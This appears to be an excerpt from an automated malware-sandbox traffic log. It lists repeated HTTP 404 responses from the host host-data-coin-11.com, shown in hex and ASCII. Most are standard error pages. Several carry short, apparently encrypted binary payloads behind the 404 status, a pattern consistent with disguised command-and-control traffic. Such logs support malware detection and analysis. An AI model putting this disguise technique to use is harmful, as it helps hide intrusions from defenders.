                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 96 d3 08 55 3b 43 be f4 d4 fc fc 43 eb 1e d1 6d bc 19 74 b6 50 a1 b9 70 b8 7b 07 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OU;CCmtPp{P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
